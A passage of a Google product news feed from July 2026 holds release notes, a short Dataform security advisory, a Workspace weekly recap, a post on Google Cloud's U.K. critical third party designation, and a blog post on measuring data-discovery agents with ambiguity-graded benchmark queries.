    <link href="https://developers.google.com/workspace/release-notes#July_13_2026" rel="alternate"/>
    <category term="Workspace Release Notes"/>
    <published>2026-07-13T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#July_13_2026</id>
    <title>Cloud Release Notes — July 13, 2026</title>
    <updated>2026-07-13T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;Dataform&lt;/h2&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;A Missing Authorization vulnerability was discovered in repositories in
BigQuery, Dataform, and Colab Enterprise. An authenticated attacker could
potentially escalate permissions and perform cross-tenant repository takeover.
For more information, see the
&lt;a href="https://docs.cloud.google.com/dataform/docs/security-bulletins#gcp-2026-047"&gt;GCP-2026-047&lt;/a&gt;
Dataform security bulletin.&lt;/p&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#July_13_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-07-13T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#July_12_2026</id>
    <title>Cloud Release Notes — July 12, 2026</title>
    <updated>2026-07-12T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;Google SecOps&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Publisher Agent Version 2.7.0&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Publisher Agent Version 2.7.0 is now available for all regions.&lt;/p&gt;
&lt;p&gt;This release includes the following updates for the remote agent:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;High Availability support:&lt;/strong&gt; Adds applicative support for Publisher high availability.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;File transfer support:&lt;/strong&gt; You can now upload and download files using playbooks and the SDK on agents that have been migrated to the GCOM infrastructure.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 class="release-note-product-title"&gt;Google SecOps SOAR&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Publisher Agent Version 2.7.0&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://docs.cloud.google.com/chronicle/docs/soar/release-notes#July_05_2026"&gt;Publisher Agent Version 2.7.0&lt;/a&gt;
is now available for all regions.&lt;/p&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#July_12_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-07-12T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#July_11_2026</id>
    <title>Cloud Release Notes — July 11, 2026</title>
    <updated>2026-07-11T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;Google SecOps SOAR&lt;/h2&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://docs.cloud.google.com/chronicle/docs/soar/release-notes#July_5_2026"&gt;Release 6.3.92&lt;/a&gt; is now
available for all regions.&lt;/p&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#July_11_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-07-11T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/07/weekly-recap-07-10-2026.html</id>
    <title>Google Workspace Weekly Recap - July 10, 2026</title>
    <updated>2026-07-10T20:19:20+00:00</updated>
    <content type="html">&lt;h3 style="text-align: left;"&gt;Join video conferences on Google Meet hardware via SIP through Pexip&lt;/h3&gt;&lt;p&gt;You can now join video conferences on Google Meet hardware via SIP through a Pexip interop gateway. This brings universal connectivity for users to join meetings hosted on any SIP-compatible platform directly from their Meet rooms. The functionality is available for room hardware based on both Android and ChromeOS.&amp;nbsp;| &lt;a href="https://workspaceupdates.googleblog.com/2026/07/join-video-conferences-on-google-meet-hardware-via-SIP-through-Pexip.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Occupancy counting now available for Google Meet on Neat room hardware&lt;/h3&gt;&lt;p&gt;Occupancy counting is now available for Android-based Neat room hardware to help measure how meeting rooms are used. This feature brings the same occupancy counting capabilities found on ChromeOS devices to Android-based hardware. | &lt;a href="https://workspaceupdates.googleblog.com/2026/07/occupancy-counting-now-available-for-Google-Meet-on-Neat-room-hardware.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Fill with Gemini in Sheets now available in 11 additional languages&lt;/h3&gt;&lt;p&gt;We're leveraging the capabilities of the AI function in Google Sheets, Fill with Gemini eliminates the need for complex formulas, helping you easily generate text, summarize information, categorize data, or analyze sentiment at scale with generated content appearing directly in the cells you choose. | &lt;a href="https://workspaceupdates.googleblog.com/2026/07/fill-with-gemini-in-sheets-now-available-in-11-additional-languages.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;New calendar sharing permission level and changes to recurring event visibility&lt;/h3&gt;&lt;p&gt;We're introducing a new calendar sharing permission level: “Make changes (see private events as free/busy)”. This allows you to grant someone edit access to your calendar while keeping the details of your private events entirely hidden. This is especially useful for leaders who assign delegates to help them manage their calendars. | &lt;a href="https://workspaceupdates.googleblog.com/2026/07/new-calendar-sharing-permission-level-and-changes-to-recurring-event-visibility.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Convert your Google Slides to videos in 7 additional languages&lt;/h3&gt;&lt;p&gt;Google Vids already lets you convert your Slides content into Vids with AI-generated scripts, voiceovers, background music, and animations for presentations and accounts in English. We’re now expanding support to French, German, Italian, Japanese, Korean, Portuguese, and Spanish. | &lt;a href="https://workspaceupdates.googleblog.com/2026/07/convert-your-google-slides-to-videos-in-7-additional-languages.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Streamline identity lifecycle management in Google Workspace with new inbound SCIM support&lt;/h3&gt;&lt;p&gt;We are excited to announce the general availability of Google Workspace inbound SCIM APIs to help IT administrators standardize identity lifecycle management. This new capability allows you to sync your Google Workspace directory in real time with any SCIM-compatible Identity Provider (IdP), HR system (HRIS), or custom application. | &lt;a href="https://workspaceupdates.googleblog.com/2026/07/streamline-identity-lifecycle-management-in-Google-Workspace-with-new-inbound-SCIM-support.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;&lt;span style="font-size: x-small;"&gt;The announcements above were published on the Workspace Updates blog over the last week. Please refer to the original blog posts for complete details.&lt;/span&gt;&lt;/p&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/07/weekly-recap-07-10-2026.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-07-10T20:19:20+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/identity-security/contributing-to-uk-financial-sector-resilience-as-a-critical-third-party</id>
    <title>Contributing to U.K. financial sector resilience as a critical third party</title>
    <updated>2026-07-10T17:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;At Google Cloud, we take our role in the financial ecosystem very seriously. We firmly believe that operational resilience is essential to driving and sustaining responsible innovation.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Today, we mark a milestone in our ongoing commitment to the financial sector that’s directly relevant to our customers in the U.K. On July 10, the U.K. Treasury &lt;/span&gt;&lt;a href="https://www.legislation.gov.uk/uksi/2026/777/made" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;designated&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; Google Cloud EMEA as a critical third party (CTP) to the U.K. financial sector under the &lt;/span&gt;&lt;a href="https://www.bankofengland.co.uk/-/media/boe/files/prudential-regulation/supervisory-statement/2024/ss624-november-2024.pdf" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;CTP regime&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This designation takes account of the number and type of U.K. firms using our services and the materiality of their use cases. We acknowledge HMT’s decision on the systemic impact of our services and are committed to playing our part in safeguarding the stability of, and confidence in, the U.K. financial system.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Building sector-wide resilience&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As a CTP, Google Cloud EMEA will be directly overseen by the Bank of England, the Prudential Regulation Authority (PRA), and the Financial Conduct Authority (FCA). These authorities are known collectively as the U.K. financial regulators. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In their oversight of CTPs, the U.K. financial regulators will aim to build sector-wide operational resilience. Google Cloud wholeheartedly supports this objective. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We will continue to engage constructively with the U.K. financial regulators as we enter this new phase of deeper collaboration. We are confident that this ongoing dialogue will deliver tangible benefits for the U.K. financial sector. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Enabling customer success&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Alongside our commitment to effective oversight, Google Cloud remains dedicated to supporting our customers with the requirements for U.K. firms relating to operational resilience, outsourcing and third party risk management. &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We provide insight into how Google Cloud can help customers meet their operational resilience obligations under PRA Supervisory Statement 1/21 in our &lt;/span&gt;&lt;a href="https://services.google.com/fh/files/misc/pra_ss1_whitepaper_googlecloud.pdf" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;SS1/21 whitepaper&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We explain how Google Cloud’s contracts for UK firms address the outsourcing and third party risk management requirements under PRA Supervisory Statement 2/21 our &lt;/span&gt;&lt;a href="https://services.google.com/fh/files/misc/pra_ss_2_21_gcp_compliancemapping.pdf?e=48754805&amp;amp;hl=en" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;SS2/21 mapping&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;While the CTP regime does not replace these requirements, it is designed to complement them. We are confident that it will.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Looking ahead&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We look forward to collaborating with the U.K. financial regulators under the CTP regime. We will do so with the same commitment to ongoing transparency and assurance that we offer our customers and their regulators today.  &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As this new era begins, our core objective remains unchanged: to ensure Google Cloud is the most secure, scalable, and resilient platform for digital transformation.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/identity-security/contributing-to-uk-financial-sector-resilience-as-a-critical-third-party" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-10T17:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/google-health/bryson-dechambeau</id>
    <title>Bryson DeChambeau partners with Google Health.</title>
    <updated>2026-07-10T16:12:00+00:00</updated>
    <content type="html">&lt;img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/Bryson_DeChambeau_x_Google_Heal.max-600x600.format-webp.webp" /&gt;Professional golfer Bryson DeChambeau partners with Google Health to track fitness metrics using Fitbit Air to bring data-driven athletic training to daily health routin…</content>
    <link href="https://blog.google/products-and-platforms/products/google-health/bryson-dechambeau" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-10T16:12:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/innovation-and-ai/products/gemini-app/how-to-make-gemini-study-notebooks</id>
    <title>Here’s how to make study notebooks in the Gemini app.</title>
    <updated>2026-07-10T16:00:00+00:00</updated>
    <content type="html">&lt;img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/study_notebooks_in_thumbnail.max-600x600.format-webp.webp" /&gt;Studying for a test, but not sure where to start? Study notebooks, a new feature in the Gemini app, can help you get organized and learn more efficiently.Think of study …</content>
    <link href="https://blog.google/innovation-and-ai/products/gemini-app/how-to-make-gemini-study-notebooks" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-10T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/data-analytics/evaluate-agent-performance</id>
    <title>Frontier and Center: Who evaluates the evaluations?</title>
    <updated>2026-07-10T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="font-style: italic; vertical-align: baseline;"&gt;Editor’s note:&lt;/strong&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt; Some of the most interesting questions in AI are being asked by information theoreticians, around how to provide context to an emerging class of AI agents. A few weeks ago, we waded into those waters with a blog about &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/data-analytics/how-the-open-knowledge-format-can-improve-data-sharing?e=0"&gt;&lt;span style="font-style: italic; text-decoration: underline; vertical-align: baseline;"&gt;the Open Knowledge Format&lt;/span&gt;&lt;/a&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;, a specification that formalizes the LLM-wiki pattern into a portable, interoperable format to represent the metadata, context, and curated knowledge that modern AI systems need to operate. That blog generated a ton of interest, so we’ve decided to bring you more of the same, as part of our new “Frontier and Center” series. Today, we hear from two members of Google Data Cloud’s frontier AI team on the recurring challenge of how to systematically evaluate whether or not an agent is able to answer questions effectively based on its context. Read on for more, and watch this space for more blogs from this team.&lt;/span&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;A passing grade is the least interesting thing an exam can tell you. It says the student cleared the bar; leaving you entirely in the dark about how narrow their failures were, how effortless their passes were, or what to teach next. Yet this is exactly how we evaluate AI agents. We run a fixed benchmark, calculate a score, and declare progress. In doing so, we are handing our agents a pass/fail exam when what we actually need is a map of the agent’s capabilities: a picture of the terrain that shows exactly where capability falls off, and by how much.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For data agents, this map matters a lot for data discovery&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;in search and retrieval — the unglamorous first step where an agent, handed a vague human question and a warehouse or data lake of thousands of tables and files, has to find the &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;right&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; datasets before it can reason over anything. Discovery is a "needle in a haystack" problem. Real users phrase their questions imperfectly, and inferring what datasets to retrieve presents a real challenge to agents. So the interesting question in evaluations is never "can the agent pass?" It is "how vague can the question get before the agent breaks?" An exam cannot easily answer that, but a map can. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Today, we share an approach rooted in information theory that we’ve been leveraging to add detail and nuance, i.e., fidelity, to benchmarks, so we can better understand agents’ performance as a part of their evaluations. Along the way, the added fidelity exposed some deeper issues with the quality of emergent evaluation cases themselves.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Difficulty, measured&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;When it comes to retrieval, evaluation cases are often stratified into tiers of difficulty. This can happen organically, e.g., pervasive and enduring failure scenarios are deemed difficult. Or it can be from labels applied by humans or machines categorizing some questions as "easy" or "hard" for an agent to answer correctly, e.g., based on the context provided in the query. While this kind of sentiment-based labeling is not the only way to label test cases, it’s frequently used despite its imperfections, such as being challenging to reproduce.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Despite being an industry staple, the approach of assessing every evaluation case by hand is unrealistic at scale. What we need is a rigorous approach that can modulate the difficulty of evaluation cases. We’re iterating on a &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;meta-benchmark&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; we call Discovery Bench: a framework that modulates an evaluation case by generating “easy” and “hard” variations of every case. This allows us to audit how close or how far an agent is from succeeding in those cases. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The lever for modulating the difficulty of an input query comes via a tried-and-trusted concept that’s present across information theory and machine learning: surprisal, or the likelihood of an output given a set of inputs. In our case, a query’s surprisal represents the uncertainty that remains about the correct dataset given the query.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The thinking behind our approach is simple: A term or a phrase in an evaluation query has high informative power when it sharply distinguishes the target from everything else in the corpus. Therefore, we can adjust the difficulty of evaluation cases by adding or removing terms with varying levels of informative power.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Let’s work through a real example from &lt;/span&gt;&lt;a href="https://github.com/mitdbg/KramaBench" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;KramaBench&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, a publicly available benchmark. One of KramaBench’s datasets has information about orbiting satellites, and the example query from the suite includes the following text: &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;"…the total count of satellite major altitude changes for satellite 48445 during 2024 using TLE history."&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The token &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;"TLE"&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; is sharply distinguishing; it points almost uniquely at the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;TLE_____48445&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; table from the dataset. Strip it, and the query degrades to &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;"the count of satellite altitudes for satellite 48445,"&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; whose vague phrasing now matches density tables, precise-orbit files, and decay logs alike. Surprisal makes this quantitative: rare, pointed terms carry more bits than common ones.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The remaining surprisal of a query is how much uncertainty is left about its answer. As surprisal approaches zero&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;,&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; the query has become specific enough to pinpoint exactly one dataset.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The heart of the idea behind Discovery Bench is this refinement loop, which we call &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;iterative surprisal-based query refinement&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;, or iSQR, which generates cases with higher or lower informative power to test where an agent can start successfully answering the query:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="Who Evaluates the Evaluations_ - FP blog" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Who_Evaluates_the_Evaluations__-_FP_blog.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 2: The iSQR refinement loop.&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The crux is being able to control the challenge embedded into the evaluation case by making adjustments: Instead of one fixed phrasing per question, we generate the &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;same&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; question at three levels of calibrated ambiguity [high, medium, low], with each grounded in bits (not subjective opinion). We can even justify, term by term, &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;why&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; a word was added or removed. Difficulty stops being a property that is attributed by sentiment or classification, and becomes one we &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;engineer&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;The cliff you couldn't see&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Here is what Discovery Bench’s difficulty dial reveals — and what a single-phrasing benchmark structurally cannot.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We have an F1 agent that's built for recall (on Gemini 3.1 Pro). Running it against KramaBench and across the full sweep of ambiguity levels traces a curve: 0.34 at high ambiguity, 0.76 at neutral, 0.81 at medium, 0.78 at low.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="image1" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/image1_viEBS6x.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 3: F1 swept across ambiguity — the dot versus the curve.&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Two findings fall out immediately (and neither were visible to a conventional eval).&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;First, the cliffs.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; This query scores a perfect &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;F1 = 1.00&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; at neutral phrasing — and &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;0.00&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; at high ambiguity. It is the satellite-48445 case from above: drop the distinguishing token "TLE" and the agent loses the table entirely. Same query, same agent, same ground truth; one notch vaguer and it falls off a cliff. A static benchmark tests the neutral phrasing, stamps "solved," and reports flat ground where there is a precipice. Pass/fail was particularly misleading in that it did not just miss the cliff, but it told us the terrain was level.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Second, the sweet spot.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; For Discovery Agent, medium ambiguity &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;beat&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; neutral, and low ambiguity sometimes &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;underperformed&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; it. More specificity is not monotonically better for the system being evaluated; there is an optimal amount of steering. That is a graded, actionable signal. This is the "how close, how hard" texture we were missing from a scalar. It tells you where to hill-climb, or improve, the agent: in our case, straight at concrete failure modes like time-sharded tables (precision collapsing to ~8% as the agent over-retrieves 21 near-identical shards for a two-table answer) and context blow-up (F1 dropping from 0.75 to 0.32 once a query triggers long search chains). The map did not just say that the agent failed, but it said where, and why. Note that our hypothesis that less ambiguity and more context (via steering terms) should improve retrieval generally holds true, but for the specific Discovery Agent being exercised, the idiosyncratic “sweet spot” meaningfully highlighted trade-offs in its implementation.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;We're not alone&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The field is converging on meta-benchmarking and exerting greater control of how we challenge and evaluate our agents. A growing body of work uses &lt;/span&gt;&lt;a href="https://en.wikipedia.org/wiki/Item_response_theory" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;item response theory&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, the latent-ability model behind standardized testing, to treat difficulty as a measured quantity rather than a label: &lt;/span&gt;&lt;a href="https://arxiv.org/abs/2402.14992" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;tinyBenchmarks&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://arxiv.org/abs/2407.12844" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;metabench&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; show that a handful of informative items reproduce a model's full score, and &lt;/span&gt;&lt;a href="https://arxiv.org/abs/2505.15055" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;PSN-IRT&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; turns the same lens on benchmark quality itself. Others audit the ground truth directly: &lt;/span&gt;&lt;a href="https://arxiv.org/abs/2406.04127" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;MMLU-Redux&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; found that 6.49% of Massive Multitask Language Understanding (MMLU) questions are mislabeled, and &lt;/span&gt;&lt;a href="https://arxiv.org/abs/2502.03461" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Platinum Benchmarks&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; re-cleaned ten datasets to minimize both label errors and ambiguity — the same two axes we sweep for. And ambiguity is increasingly treated as intrinsic rather than noise: &lt;/span&gt;&lt;a href="https://aclanthology.org/2020.emnlp-main.466/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;AmbigQA&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; showed that a large fraction of real questions admit multiple readings, and later work finds that apparent hallucinations often stem from query ambiguity rather than model failure. What we have not seen elsewhere is the combination: information-theoretic ambiguity sweeping applied as a meta-benchmark over live enterprise data.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;A benchmark we trusted turned out to be broken&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We built our first evaluation on &lt;/span&gt;&lt;a href="https://arxiv.org/abs/2506.06541" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;kramabench-astronomy&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, a benchmark established in the field, and one which other teams had already leaned on for their own evals. Teams derived benchmarks from this dataset, and we hypothesized subtle issues may have been introduced over time. When we actually read the benchmarks used by teams, with Gemini's help, we found it was wrong in meaningful ways: ground-truth tables that did not answer their query, a question whose 124 sharded tables exceeded what some teams’ retrieval APIs could even return, months specified where exact dates were required. Quietly broken ground truth means quietly wrong conclusions not just for us, but for every prior analysis built on it. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This is the generalized crux of the matter: an evaluation is itself an artifact that can be defective, and almost nobody evaluates it. We instrument the agent and trust the ruler, but where do we validate that the measuring stick makes sense? &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;When two maps disagree&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Now the recursive turn: If difficulty is something we &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;generate&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;, then we need to evaluate the generator itself; we should not trust it blindly either.&lt;/span&gt;&lt;/p&gt;
